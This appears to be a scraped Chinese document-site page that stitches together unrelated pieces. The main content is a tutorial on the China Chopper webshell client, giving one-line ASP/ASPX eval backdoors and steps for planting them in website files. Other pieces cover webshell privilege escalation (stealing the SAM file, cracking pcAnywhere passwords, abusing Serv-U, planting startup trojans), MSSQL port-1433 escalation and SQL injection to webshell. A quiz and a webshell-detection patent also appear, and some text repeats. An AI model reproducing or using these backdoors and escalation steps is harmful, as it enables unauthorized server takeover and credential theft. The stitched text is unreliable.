当前位置:文档之家› 中国菜刀使用教程

中国菜刀使用教程

中国菜刀使用教程
中国菜刀使用教程

想学学怎么用菜刀,刚在网上搜到了菜刀的使用方法。怕有和我一样的新手不会用,所以发过来,算是给大家分享吧。首先说一下菜刀的功能,菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。

asp的一句话是:<%eval request("pass")%>

aspx的一句话是:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

php的一句话是:

这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp 的一句话的密码改成wc,那么改完之后就是这样的:

<%eval request("wc")%>

其他同理。

要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。

当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp文件,这个asp文件的全部内容就只有一个一句话,也是可以的。

插入了一句话木马,下面就是连接了。

在菜刀主界面,右击,选择“添加”,

在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填,

填完之后单击“添加”,就可以了。

添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了

在菜刀里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能

如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

中国菜刀使用教程

想学学怎么用菜刀,刚在网上搜到了菜刀的使用方法。怕有和我一样的新手不会用,所以发过来,算是给大家分享吧。首先说一下菜刀的功能,菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。 asp的一句话是:<%eval request("pass")%> aspx的一句话是:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> php的一句话是: 这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp 的一句话的密码改成wc,那么改完之后就是这样的: <%eval request("wc")%> 其他同理。 要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。 当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp文件,这个asp文件的全部内容就只有一个一句话,也是可以的。 插入了一句话木马,下面就是连接了。 在菜刀主界面,右击,选择“添加”, 在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填, 填完之后单击“添加”,就可以了。 添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了 在菜刀里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能 如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

最全的WEBSHELL提权大大全

WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法! 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过

百科知识选择题

3.“软饮料”是指?A A.不含酒精的饮料 B.不含钙的饮料 C.不含二氧化碳的饮料 D不起泡沫的饮料 4.煤火不旺时,撒入以下哪种东西可以助长火势?A A.盐 B.糖 C.味精 D胡椒 5.鸡蛋最好不要和下面哪种食物一起存放?D A.淀粉 B.食油 C.白薯 D.生姜 6.牛奶不宜放在什么容器中保存?A A.保温瓶 B.搪瓷缸 C.陶瓷杯 7.酒后不宜饮什么?D A.果汁 B.浓茶 C.矿泉水 D.咖啡 8.酒不宜与哪种饮料一起引用?C A.果汁 B.浓茶 C汽水 9.空腹吃柿子好不好?B A.好 B.不好 10.胡萝卜适宜生吃吗?A A.不适宜 B.适宜 11.下列相同重量的食物中,所含热量最多的是?C A.苹果 B烤牛肉 C.奶油 D.牛奶 12.黑暗中用手电斜照镜子和白纸,则?A A.白纸亮 B.镜子亮 C.一样亮 13.一英尺等于?B A.10英寸 B12英寸 14.为了烧开水时节省原料应该?A A.先用中火,后用大火 B.先用大火,后用中火 15.黄豆每百克含高蛋白质高达36.3克,是大黄鱼的2倍多,但是食用不当其消化吸收率只有50%左右,科学的使用方法是?C A.煮着吃 B.炒着吃 C.磨碎吃 D.炖着吃 16.当洗完澡后,用毛巾吸干水,那么此时是否可以马上涂上润肤品?A A.是 B.否 17.买回来的蔬菜应该怎样放才合适?C A.平方 B.倒放 C.竖放 18.我国最大的旅客中转客运站是?A A.郑州站 B.北京站 C.天津站 D石家庄站 19.人的瞳孔会根据可将光的量改变大小。使瞳孔改变大小还有什么原因?B A.环境的温度 B.感情的变化 C.季节的更迭die 20.现代交通工具中船舶比汽车、火车、飞机的速度都慢,这是因为?B A.船舶的动力较小 B.船舶遇到的阻力大 C.船舶的体积太大 21.我国的五星级酒店规定总机至少能用多少种外语为客人提供电话服务?B A.2种 B.3种 C.4种 D.5种 22.偃武修文的“偃”的意思是?C A.振兴 B.提倡 C.停止 D.精简 23.诗经在表现形式上,以什么形式为主A A.四言为主 B.五言为主 C七言为主 24.唐诗“日暮乡关何处是?烟波江上使人愁”中的“江”是指?D

1433提权全教程

1433端口提权的过程 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/0010261434.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

中国菜刀使用方法

一、脚本客户端(包括但不限于EVAL)部分 1)基本信息 Eval服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。 目前支持的服务端脚本:PHP, ASP, https://www.doczj.com/doc/0010261434.html,,并且支持https安全连接的网站。 在服务端运行的代码如下: PHP: ASP: <%eval request("chopper")%> https://www.doczj.com/doc/0010261434.html,: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> (注意: https://www.doczj.com/doc/0010261434.html,要单独一个文件或此文件也是Jscript脚本) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。 此模式可按需定制,比如只要浏览目录,或是只要虚拟终端功能,代码可以很简短。 2)几大功能 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理,自写脚本几大块功能。 1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2. 虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。 3. 数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持ADO方式连接的数据库。 如果精通SQL语法,何必还要PHPMYADMIN呢?而且,菜刀还支持任何脚本的数据库管理呢。 (各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 4. 自写脚本:通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。 如果要写自己的CCC脚本,可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。 可以在官网下载别人的CCC脚本,或分享你的得意之作。 注意:由于服务器的安全设置,某些功能可能不能正常使用。 3) 配置信息填写说明 --------------------------------------------------------------------------------------- A) 数据库方面: ----------------------------------------------------------------------------- PHP脚本: 类型 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址 主机地址可为机器名或IP地址,如localhost

授渔之1433提权全教程

授渔之<一次1433端口提权的过程> 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/0010261434.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

中国菜刀(网站管理软件)使用教程

中国菜刀 中文名:中国菜刀 英文名:ChinaChopper 大小:215kb 授权:免费软件 产地:国产软件 授权:免费软件 更新时间:2011/11/15 平台:WinXP, win7, WinAll 工具下载地址:https://www.doczj.com/doc/0010261434.html,/s/1da3Oq 简介: 产品名称:中国菜刀,不是原来切菜做饭的道具,而是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!程序大小:214K,在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。 -------------------------------------------------------------------------- 免责申明:请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任! -------------------------------------------------------------------------- 功能介绍: 只要支持动态脚本的网站,都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理。 UINCODE方式编译,支持多国语言输入显示。 一、EVAL客户端部分 1)要了解的 服务端只需要简单的一行代码,即可用此程序实现常用的管理功能。 支持的服务端脚本:PHP, ASP,NET。 在服务端运行的代码如下: PHP: ASP: <%eval request("pass")%>

获得网站WEBSHELL权限的截图0

获得网站WEBSHELL权限 一、学习目标:在得到了管理员帐号的情况下,进入网站的管理员后台,以备份数据库得到WEBSEHLL。 二、知识要点:在入侵网站之前,信息搜集是第一步,任何情况的搜集,当情况搜集有初步成果之后,应该首先试图获得管理员的帐号和密码,然后找出网站的后台(看管理员在后台的什么地方),对于现成的整站系统而言,通常后台是固定的,只要搞到网站就能以管理员的帐号进入。进了后台,就有了能力对网站进行操作,我们就有了很大的把握获得的一个WEBSEHLL。所谓WEBSEHLL,也就是一个脚本,这个脚本,具有可以管理WEB、修改主页内容的权限,如果要修改别人的主页,一般都需要这个权限(上传漏洞要得到的也是这个权限)。它可对网站的任何文件进行编辑,移动,复制,删除。如果某个服务器权限设置得不好,那么通过webshell可以得到该服务器的最高权限----即可以得到的是整个网站的操作权限,并且是进一步渗透获得主机权限的立脚点。 在进入管理后台后,获得WEBSHELL的首选方法是通过"备份数据库"的方法上传一个扩展名改成GIF的ASP木马,(之所以要把ASP的木马护展名由ASP改为GIF,是因为一般网站都有检测护展名,当检测到护展名为ASP时就不会允许上传),上传之后,用备份数据库的办法,把GIF护展名,备份成为ASP护展名,然后连接备份后的ASP地址,就能打开你上传的ASP木马,一个WEBSEHLL就到手了。具体方法为在备份数据库地址里输入你上传的GIF文件的相对地址,在恢复地址里输入你要生成的ASP地文件的路径和文件名,然后恢复数据库即可。 三、实验步骤 1、IE浏览器中输入https://www.doczj.com/doc/0010261434.html,/bbsxp1(之前已经通过某方法得到网站后台管理员的用户名、口令)。 (1)以管理员身份登录网站前台,如图1。 图1 (2)在图2界面中进入ACCESS数据库管理,并在图3界面中输入后台管理员密码完成登录。

九种经典的Webshell提权

说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里, 那么就会用到ftp,服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写~ 好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 用我新建的用户和密码连接~ 好的,还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提示没有权限,那我们就 把后门(server.exe)传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0)

通过菜刀工具获取目标主机权限

获取webshell后,上传一句话木马,通过中国菜刀连接启动3389服务,添加管理员账户,获取目标主机的权限 获取webshell插入一句话木马的方法有很多,不一定是通过sql注入。从中国菜刀连接上靶机后,获取服务器权限的步骤方式都一样 Setp 0 实验环境 实验工具:中国菜刀Pr 御剑Pangolin 3389 Step 1 目录扫描 工具:御剑 路径:C:\Tools\目录扫描\ 在目录列表中查找后台,发现存在/admin 不过用户名和密码都不知道,没关系,进行下一步:获取用户名和密码。 Step 2 工具:旁注WEB综合检测程序Ver3.6修正版 打开工具,依次点击[SQL注入] -->[批量扫描注入点] --> [添加网址] --> [批量分析注入点];出现下面这个对话框说明已经检测完毕;

点击OK进行下一步; 注入点分析完毕后,会在下方列表中显示可注入的地址,选择其中一个地址,右键选择[检测注入]; 点击[检测注入] 后,主界面从[批量扫描注入点] 转到[SQL注入猜解检测],点击[开始检测];检测完毕后,显示可以注入,并列出了数据库类型:Access数据库; 下面开始逐步[猜解表名] -->[猜解列名]--> [猜解内容];点击[猜解表名] 后,在数据库列表中会显示4个表,分别是admin、user、movie和news; 选择admin表,点击[猜解列名],成功猜解出三个列名id、username和password; 勾选username和password,点击[猜解内容],右侧列表中成功显示用户名admin,密码469e80d32c0559f8 成功找到明文密码:admin888;

(零基础)手工注入+burpsuite拿webshell

之前由于不会安装vm版的bt5而在网上求救,结果认识了一找不到片的基友,00后的,,感觉顿时无语了…………聊天时,他说sqlmap 和burpsuite都很强大…………玩完sqlmap后,就一直想学burpsuite来着,,但是一直都没学,这几天才刚开始完的…………感觉确实强大,能够拦截,查看和修改网站流量………………不废话,开始 目标站,https://www.doczj.com/doc/0010261434.html,(不要问我怎么找的……百度高级搜索inurl:asp?id=XX) 点一链接,在网站后加 and 1=1 回车,页面正常,,加and 1=2 ,回车,不正常,,,判断存在sql 注入漏洞(当然存在啊,不然怎么做教程,只是说下如何判断注入) 然后order by 查询字段(是叫做字段吗,我对概念不清楚,虽然我为这还自学了mysql……暂且叫字段吧) 如图,12不正常,11正常,说明字段为11(11之前的都正常)

然后在地址后加入 union select 1,2,3,4,5,6,7,8,9,10,11 from admin,也就是访问 https://www.doczj.com/doc/0010261434.html,/show_content.asp?id=1361 union select 1,2,3,4,5,6,7,8,9,10,11 from admin(别问我admin哪来的,,微软access数据库默认的表,也不能说是默认的吧,大多都是这样,下面的username和password也是这样),看图吧 看到2 3 没,爆出查询点了,,把2换成username,3换成password(当然2换成password,3为username也行),回车,如图 username为admin,,密码为MD5加密的值,拿去解密,如图

传统制刀工艺那些事儿

传统制刀工艺那些事儿 有俗谚称:“高密刀、高密镰,蹭蹭磨磨用三年;能切大能切小,一切切到海南岛;能切粗能切细,一切切到意大利。” 日本工匠的守护 用钳子从火炉中夹出烧得通红的钢块,山田佳孝娴熟地抡起铁锤锻打起来,火花四溅,但山田身上却未穿戴任何护具。“打刀20多年,我知道火花怎么飞溅,一点也不怕,”山田笑着说。 山田佳孝今年44岁,是日本京都百年老店“金高刀具店”的打刀匠。“金高刀具店”藏身于京都闹市区,外观不起眼,却有着200多年的历史。如今,山田佳孝和长兄山田和宏一起续写着家族传奇。 在日本,打刀匠作为一种职业起源于公元12世纪前后。千百年来,一代代打刀匠探索钻研,创造出独特的日式制刀工艺,并传承至今。京都现存约10家传统打刀铺,每家各有千秋,自成品牌。 “金高刀具店”的打刀作坊不足10平方米,只有一座火炉和一些古老简单的锻打、研磨工具,没有任何现代化仪器,但从温控、冷却到锻打、研磨,制刀的各个环节都彰显

出工匠的精湛技艺,凝聚着日本制刀业的千年沉淀。 对刀具生产而言,温控十分关键。日本刀具的一大特点是,刀背和刀刃分别由软铁和硬钢两种不同材质的原料熔炼锻接而成,对温控的要求极为严苛。但在金高打刀作坊,没有测温仪,炉温控制全靠山田的眼睛。“我看一眼炉内钢块的颜色,就知道温度,”山田说,炉内钢块超过一定温度后,温度变化引起的色差极小,温度拿捏很考验工匠的水平。山田更相信自己的感觉,而不是仪表数据。他说,作坊的气温和水温随着四季交替变化,他会根据时节对钢块出炉的温度进行精细微调,以保持最佳。 锻打成型后,山田将火烫的刀具放入稻草灰堆,冷却一晚上。“这是日本特有的冷却法,很古老,但它比放在空气中冷却更能缓和锻打后的金属疲劳,是先人的智慧结晶,”山田说。 生于打刀世家,山田从小就给身为第六代传人的父亲磨刀打杂。20岁那年,父亲决定传授他锻打技艺,但在入门头3年,父亲却只让他干一件事――敲碎木炭。原来,对日本传统制刀业来说,如何将整块的长条木炭均匀地敲打成最适合烧炼的形状,也是一门很重要的技术。“我一开始很不解,后来才得知,业内有‘入门敲炭3年’一说。学徒若不真正立志成为打刀匠,耐得住寂寞,不可能熬得过去,”山田说。 在日本,掌握锻打、淬火、研磨等技术,成长为一名独

【CN109905385A】一种webshell检测方法、装置及系统【专利】

(19)中华人民共和国国家知识产权局 (12)发明专利申请 (10)申请公布号 (43)申请公布日 (21)申请号 201910123769.5 (22)申请日 2019.02.19 (71)申请人 中国银行股份有限公司 地址 100818 北京市西城区复兴门内大街1 号 (72)发明人 俞学浩 蔡传智 王倩  (74)专利代理机构 北京三友知识产权代理有限 公司 11127 代理人 李辉 (51)Int.Cl. H04L 29/06(2006.01) G06F 17/27(2006.01) (54)发明名称 一种webshell检测方法、 装置及系统(57)摘要 本说明书实施例公开了一种webshell检测 方法、装置及系统,所述方法包括获取待检测网 页的PHP脚本数据对应的第一中间字节码数据; 利用构建的监督学习算法对所述第一中间字节 码数据进行识别,获得所述待检测网页的 webshell检测结果,其中,所述监督学习算法包 括对确定为webshell的PHP脚本数据以及确定为 正常的PHP脚本数据对应的第二中间字节码数据 进行训练得到的webshell检测模型。利用本说明 书各实施例,可以提高PHP webshell检测的准确 性。权利要求书2页 说明书13页 附图3页CN 109905385 A 2019.06.18 C N 109905385 A

权 利 要 求 书1/2页CN 109905385 A 1.一种webshell检测方法,其特征在于,包括: 获取待检测网页的PHP脚本数据对应的第一中间字节码数据; 利用构建的监督学习算法对所述第一中间字节码数据进行识别,获得所述待检测网页的webshell检测结果,其中,所述监督学习算法包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行训练得到的webshell检测模型。 2.根据权利要求1所述的方法,其特征在于,所述利用构建的监督学习算法对所述第一中间字节码数据进行识别,包括: 基于预设的分词库,利用TF-IDF算法对所述第一中间字节码数据进行特征提取,获得所述待检测网页的特征数据,其中,所述分词库包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行分词处理后获得分词数据; 利用构建的监督学习算法对所述待检测网页的特征数据进行识别。 3.根据权利要求2所述的方法,其特征在于,所述利用TF-IDF算法对所述第一中间字节码数据进行特征提取,包括: 将所述第一中间字节码数据进行分词处理,获得所述待检测网页的PHP脚本数据对应的第一分词集合; 利用TF-IDF算法计算所述分词库中每个词相对所述第一分词集合的TF-IDF值; 将所述TF-IDF值按照相应的词在分词库中的位置进行一一对应,获得由TF-IDF值组成的向量,将该向量作为所述待检测网页的特征向量。 4.根据权利要求2或3所述的方法,其特征在于,所述预设的分词库采用下述方式构建: 获取确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据,获得样本集合; 将所述样本集合中的各脚本数据转换成中间字节码数据,获得各脚本数据对应的第二中间字节码数据; 对所述第二中间字节码数据进行分词处理,获得各脚本数据对应的第二分词集合; 将所述第二分词集合进行融合处理,获得分词库。 5.根据权利要求4所述的方法,其特征在于,所述webshell检测模型采用下述方式训练得到: 利用TF-IDF算法计算所述分词库中每个词相对所述第二分词集合的TF-IDF值,获得相应脚本数据的特征向量; 利用监督学习算法对所述确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据所对应的特征向量进行学习,获得webshell检测模型。 6.根据权利要求1所述的方法,其特征在于,所述待检测网页的webshell检测结果包括待检测网页是否属于webshell网页或者属于webshell网页的概率。 7.一种webshell检测装置,其特征在于,所述装置包括: 数据获取模块,用于获取待检测网页的PHP脚本数据对应的第一中间字节码数据; 检测模块,用于利用构建的监督学习算法对所述第一中间字节码数据进行识别,获得所述待检测网页的webshell检测结果,其中,所述监督学习算法包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行训练得到的webshell检测模型。 2

服务器提权的介绍和方法

现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。 首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。 下面我们就进入主题,对webshell的提权方法! 首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。 在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起: 1.pcanywhere的提权方法 pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下载它的CIF文件,然后使用pcanywhere的密码读取器得到pcAnywhere密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。 2.Serv-U提权方法 Serv-u可以说是网络上比较火的一款FTP服务器软件,有许多像我这样的小黑们都是看系统服务中是否有Serv-u的系统进程来进行提权的。Serv-u的提权方法针对不同的版本也有不同的方法,这里我们就列举一二,可能不是很全,但在其他网友的回复中能够不断的补充吧! a.serv-U本地提权:serv-U本地提权一般是利用溢出程序对serv-u的设置上的缺陷进行添加超级账户的功效。例如Xiaolu写的serv-u.exe就是利用sevr-u的默认管理端口,管理员账号和密码进行提权的,默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u进行管理,利用本地提权的关键就是寻找服务器文件目录中的everyone权限目录,下面我给大家列举些常见的everyone权限目录: c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\Documents\ 很多时候data目录不行,试试这个很多主机都是erveryone 完全控制! C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP)

最全的WEBSHELL提权方法总结

最全的WEBSHELL提权方法总结 在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用 WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RA V\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM :( 错 CAcls命令

1433提权详解

